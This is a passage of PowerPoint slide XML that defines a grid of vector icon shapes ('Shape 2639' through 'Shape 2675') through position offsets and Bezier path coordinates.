                  <a:pt x="14343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59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69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2"/>
                  <a:pt x="2409" y="19658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30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5"/>
                  <a:pt x="8284" y="16924"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16485" y="9592"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17662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3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39" name="Shape 2639"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="1320643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3745" y="1543"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14287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7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7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19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70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7"/>
                  <a:pt x="9818" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="4974"/>
                  <a:pt x="10038" y="4629"/>
                  <a:pt x="10309" y="4629"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="4629"/>
                  <a:pt x="10800" y="4974"/>
                  <a:pt x="10800" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="5827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3"/>
                  <a:pt x="8836" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="6678"/>
                  <a:pt x="9496" y="7714"/>
                  <a:pt x="10309" y="7714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11123" y="7714"/>
                  <a:pt x="11782" y="6678"/>
                  <a:pt x="11782" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="4123"/>
                  <a:pt x="11123" y="3086"/>
                  <a:pt x="10309" y="308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0" name="Shape 2640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="1320643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3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="5877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="5105"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="5105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09"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="8191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="6648"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="6648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2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19"/>
                  <a:pt x="16691" y="18514"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="15134"/>
                </a:ln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5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2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4" y="9257"/>
                  <a:pt x="2945" y="10984"/>
                  <a:pt x="2945" y="13114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="15245"/>
                  <a:pt x="4044" y="16971"/>
                  <a:pt x="5400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1" name="Shape 2641"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="1320643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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="14138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="7462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="4994"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="4994"/>
                  <a:pt x="20618" y="16606"/>
                  <a:pt x="20618" y="16606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4"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20890" y="3167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16018" y="6229"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16013" y="6233"/>
                  <a:pt x="16008" y="6235"/>
                  <a:pt x="16003" y="6239"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15980" y="6252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15983" y="6260"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15822" y="6387"/>
                  <a:pt x="15709" y="6641"/>
                  <a:pt x="15709" y="6943"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="14657"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="14959"/>
                  <a:pt x="15822" y="15213"/>
                  <a:pt x="15983" y="15340"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15980" y="15347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16002" y="15360"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16008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6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1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2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3"/>
                  <a:pt x="1422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3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19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19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2" name="Shape 2642"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="1282553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9"/>
                  <a:pt x="6873" y="10260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="9962"/>
                  <a:pt x="6653" y="9720"/>
                  <a:pt x="6382" y="9720"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6110" y="9720"/>
                  <a:pt x="5891" y="9962"/>
                  <a:pt x="5891" y="10260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="10559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2"/>
                  <a:pt x="3927" y="11340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="11639"/>
                  <a:pt x="3708" y="11880"/>
                  <a:pt x="3436" y="11880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3165" y="11880"/>
                  <a:pt x="2945" y="11639"/>
                  <a:pt x="2945" y="11340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="11042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2"/>
                  <a:pt x="1964" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="19199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9"/>
                  <a:pt x="14727" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="18602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0"/>
                  <a:pt x="8342" y="6404"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8562" y="6842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8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1"/>
                  <a:pt x="8345" y="2231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7676" y="901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8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5"/>
                  <a:pt x="21030" y="19440"/>
                  <a:pt x="21109" y="19440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21380" y="19440"/>
                  <a:pt x="21600" y="19199"/>
                  <a:pt x="21600" y="18900"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="10260"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9962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3" name="Shape 2643"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143908" y="1269857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4" name="Shape 2644"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651776" y="1269857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5" name="Shape 2645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="1307947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2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2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6" name="Shape 2646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208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7" name="Shape 2647"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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3" y="5201"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10712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3"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8343" y="4400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0"/>
                  <a:pt x="8088" y="5349"/>
                  <a:pt x="8210" y="5381"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8965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8"/>
                  <a:pt x="8836" y="8627"/>
                  <a:pt x="8836" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="7221"/>
                  <a:pt x="9142" y="6665"/>
                  <a:pt x="9609" y="6309"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9336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8"/>
                  <a:pt x="9820" y="8019"/>
                  <a:pt x="10055" y="7884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10172" y="7815"/>
                  <a:pt x="10251" y="7706"/>
                  <a:pt x="10284" y="7585"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10823" y="5573"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10855" y="5452"/>
                  <a:pt x="10841" y="5318"/>
                  <a:pt x="10773" y="5201"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13421" y="10343"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12630" y="10132"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13306" y="9598"/>
                  <a:pt x="13745" y="8785"/>
                  <a:pt x="13745" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="6643"/>
                  <a:pt x="13013" y="5604"/>
                  <a:pt x="11967" y="5152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3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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11142" y="10766"/>
                  <a:pt x="11157" y="10761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4" y="11107"/>
                  <a:pt x="13855" y="10807"/>
                  <a:pt x="13719" y="10572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13651" y="10455"/>
                  <a:pt x="13542" y="10376"/>
                  <a:pt x="13421" y="103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8" name="Shape 2648"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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1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1"/>
                  <a:pt x="8972" y="8836"/>
                  <a:pt x="8836" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8566" y="8836"/>
                  <a:pt x="8345" y="9056"/>
                  <a:pt x="8345" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="9463"/>
                  <a:pt x="8400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5" y="11782"/>
                  <a:pt x="10800" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10935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200" y="9586"/>
                  <a:pt x="13255" y="9463"/>
                  <a:pt x="13255" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13255" y="9056"/>
                  <a:pt x="13034" y="8836"/>
                  <a:pt x="12764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49" name="Shape 2649"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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5" y="3927"/>
                  <a:pt x="10800" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10665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0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29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29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200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0" name="Shape 2650"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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1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1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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9763" y="6149"/>
                  <a:pt x="9818" y="6027"/>
                  <a:pt x="9818" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="5620"/>
                  <a:pt x="9598" y="5400"/>
                  <a:pt x="9327" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9192" y="5400"/>
                  <a:pt x="9069" y="5455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20"/>
                  <a:pt x="6873" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="7990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5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1" name="Shape 2651"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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5"/>
                  <a:pt x="12408" y="5400"/>
                  <a:pt x="12273" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12001" y="5400"/>
                  <a:pt x="11782" y="5620"/>
                  <a:pt x="11782" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="6027"/>
                  <a:pt x="11837" y="6149"/>
                  <a:pt x="11926" y="6238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5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0"/>
                  <a:pt x="14727" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="7720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2" name="Shape 2652"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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3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20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1"/>
                  <a:pt x="7004" y="15709"/>
                  <a:pt x="10800" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14596" y="15709"/>
                  <a:pt x="17673" y="13511"/>
                  <a:pt x="17673" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="9878"/>
                  <a:pt x="17310" y="9018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2"/>
                  <a:pt x="9818" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="10529"/>
                  <a:pt x="10258" y="10309"/>
                  <a:pt x="10800" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11342" y="10309"/>
                  <a:pt x="11782" y="10529"/>
                  <a:pt x="11782" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="11072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6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6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29"/>
                  <a:pt x="18655" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="16472"/>
                  <a:pt x="18874" y="16691"/>
                  <a:pt x="19145" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19417" y="16691"/>
                  <a:pt x="19636" y="16472"/>
                  <a:pt x="19636" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="15929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29"/>
                  <a:pt x="1964" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="16472"/>
                  <a:pt x="2183" y="16691"/>
                  <a:pt x="2455" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2726" y="16691"/>
                  <a:pt x="2945" y="16472"/>
                  <a:pt x="2945" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="15929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3" name="Shape 2653"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425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4" name="Shape 2654"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686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5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5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5" name="Shape 2655"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="1828511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69"/>
                  <a:pt x="17892" y="6000"/>
                  <a:pt x="18164" y="6000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18435" y="6000"/>
                  <a:pt x="18655" y="6269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7"/>
                  <a:pt x="16691" y="6600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="7594"/>
                  <a:pt x="17351" y="8400"/>
                  <a:pt x="18164" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18977" y="8400"/>
                  <a:pt x="19636" y="7594"/>
                  <a:pt x="19636" y="6600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="5607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69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69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1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1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8"/>
                  <a:pt x="9173" y="15600"/>
                  <a:pt x="10800" y="15600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12426" y="15600"/>
                  <a:pt x="13745" y="13988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69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69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6" name="Shape 2656"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208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7" name="Shape 2657"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="17673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5"/>
                  <a:pt x="8294" y="13745"/>
                  <a:pt x="8836" y="13745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9378" y="13745"/>
                  <a:pt x="9818" y="14185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4"/>
                  <a:pt x="14185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8" name="Shape 2658"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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2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2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9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8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2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29"/>
                  <a:pt x="13745" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="5672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2"/>
                  <a:pt x="9716" y="16691"/>
                  <a:pt x="10800" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11884" y="16691"/>
                  <a:pt x="12764" y="15812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9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2"/>
                  <a:pt x="7855" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="5129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2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8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59" name="Shape 2659"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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4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199"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12102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6"/>
                  <a:pt x="11716" y="6199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5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8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8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3" y="3927"/>
                  <a:pt x="17673" y="4367"/>
                  <a:pt x="17673" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="5451"/>
                  <a:pt x="18113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2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0" name="Shape 2660"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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3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3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1"/>
                  <a:pt x="4147" y="21600"/>
                  <a:pt x="4418" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4689" y="21600"/>
                  <a:pt x="4909" y="21381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1"/>
                  <a:pt x="16911" y="21600"/>
                  <a:pt x="17182" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17453" y="21600"/>
                  <a:pt x="17673" y="21381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1" name="Shape 2661"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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2" y="18655"/>
                  <a:pt x="982" y="18215"/>
                  <a:pt x="982" y="17673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2" name="Shape 2662"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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3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3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3" name="Shape 2663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="2399862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4" name="Shape 2664"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="2399862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5" name="Shape 2665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="2399862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6" name="Shape 2666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="2399862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9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9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7" name="Shape 2667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="2933123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8" name="Shape 2668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="2933123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4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4"/>
                  <a:pt x="982" y="18000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="3600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="2606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6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1"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="14401"/>
                  <a:pt x="21600" y="13594"/>
                  <a:pt x="21600" y="12600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="9000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="8006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69" name="Shape 2669"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960077" y="2869640"/>
            <a:ext cx="253935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8"/>
                  <a:pt x="12420" y="2669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12420" y="2940"/>
                  <a:pt x="12662" y="3160"/>
                  <a:pt x="12960" y="3160"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12960" y="3172"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17287" y="4066"/>
                  <a:pt x="20520" y="7577"/>
                  <a:pt x="20520" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20520" y="16662"/>
                  <a:pt x="16168" y="20618"/>
                  <a:pt x="10800" y="20618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5432" y="20618"/>
                  <a:pt x="1080" y="16662"/>
                  <a:pt x="1080" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1080" y="7577"/>
                  <a:pt x="4313" y="4066"/>
                  <a:pt x="8640" y="3172"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8640" y="3160"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8938" y="3160"/>
                  <a:pt x="9180" y="2940"/>
                  <a:pt x="9180" y="2669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9180" y="2398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1"/>
                  <a:pt x="0" y="11782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2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="7031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0"/>
                  <a:pt x="11098" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10502" y="0"/>
                  <a:pt x="10260" y="220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0" name="Shape 2670"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="290773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1" name="Shape 2671"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="2869640"/>
            <a:ext cx="279328" cy="2793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6" y="15276"/>
                  <a:pt x="10995" y="15082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6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1"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12585" y="13118"/>
                  <a:pt x="12764" y="12471"/>
                  <a:pt x="12764" y="11782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1"/>
                  <a:pt x="12273" y="13681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8"/>
                  <a:pt x="4909" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="12776"/>
                  <a:pt x="5282" y="13681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9"/>
                  <a:pt x="8836" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9003" y="15709"/>
                  <a:pt x="9166" y="15696"/>
                  <a:pt x="9327" y="15675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9327" y="7888"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9166" y="7868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9"/>
                </a:ln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2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2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3"/>
                  <a:pt x="15709" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="7986"/>
                  <a:pt x="12632" y="4909"/>
                  <a:pt x="8836" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5041" y="4909"/>
                  <a:pt x="1964" y="7986"/>
                  <a:pt x="1964" y="11782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6"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17905" y="21545"/>
                  <a:pt x="18028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cubicBezTo>
                  <a:pt x="18655" y="20974"/>
                  <a:pt x="18600" y="20851"/>
                  <a:pt x="18511" y="20762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18511" y="20762"/>
                  <a:pt x="14027" y="16277"/>
                  <a:pt x="14027" y="16277"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="15709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9"/>
                  <a:pt x="17673" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16691" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="11783"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="13214"/>
                  <a:pt x="16301" y="14553"/>
                  <a:pt x="15631" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15631" y="15709"/>
                  <a:pt x="16691" y="15709"/>
                  <a:pt x="16691" y="15709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19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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2041" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2016" y="15666"/>
                  <a:pt x="1988" y="15625"/>
                  <a:pt x="1964" y="15581"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="15581"/>
                  <a:pt x="1964" y="15709"/>
                  <a:pt x="1964" y="15709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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12613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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="4504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4"/>
                  <a:pt x="3131" y="6294"/>
                  <a:pt x="3927" y="56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2" name="Shape 2672"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="290773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3" name="Shape 2673"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="286964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7"/>
                  <a:pt x="2726" y="9327"/>
                  <a:pt x="2455" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2183" y="9327"/>
                  <a:pt x="1964" y="9547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1"/>
                  <a:pt x="2183" y="21600"/>
                  <a:pt x="2455" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2726" y="21600"/>
                  <a:pt x="2945" y="21381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2"/>
                  <a:pt x="12983" y="16691"/>
                  <a:pt x="13255" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13526" y="16691"/>
                  <a:pt x="13745" y="16472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7"/>
                  <a:pt x="4690" y="9327"/>
                  <a:pt x="4418" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4147" y="9327"/>
                  <a:pt x="3927" y="9547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7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7"/>
                  <a:pt x="12544" y="3927"/>
                  <a:pt x="12273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4" name="Shape 2674"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4626383" y="2869640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7" y="1042"/>
                  <a:pt x="11190" y="987"/>
                  <a:pt x="11337" y="987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11637" y="987"/>
                  <a:pt x="11880" y="1208"/>
                  <a:pt x="11880" y="1479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11880" y="1479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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4559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5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8"/>
                  <a:pt x="12238" y="0"/>
                  <a:pt x="11339" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10880" y="0"/>
                  <a:pt x="10467" y="174"/>
                  <a:pt x="10170" y="451"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3565" y="5905"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1578" y="6050"/>
                  <a:pt x="0" y="8183"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13425"/>
                  <a:pt x="1588" y="15563"/>
                  <a:pt x="3585" y="15696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2"/>
                  <a:pt x="12960" y="20073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1"/>
                  <a:pt x="21600" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="8074"/>
                  <a:pt x="21358" y="7855"/>
                  <a:pt x="21060" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20911" y="7855"/>
                  <a:pt x="20776" y="7909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09"/>
                  <a:pt x="15809" y="7855"/>
                  <a:pt x="15660" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15362" y="7855"/>
                  <a:pt x="15120" y="8074"/>
                  <a:pt x="15120" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15120" y="8481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6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6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5" name="Shape 2675"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5210430" y="2869640"/>
            <a:ext cx="152436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1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59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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18421" y="1042"/>
                  <a:pt x="18641" y="987"/>
                  <a:pt x="18886" y="987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19385" y="987"/>
                  <a:pt x="19790" y="1208"/>
                  <a:pt x="19790" y="1479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19790" y="1479"/>
                  <a:pt x="19790" y="20121"/>
                  <a:pt x="19790" y="20121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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7595" y="6406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16192" y="2147"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16192" y="2147"/>
                  <a:pt x="16192" y="19448"/>
                  <a:pt x="16192" y="19448"/>
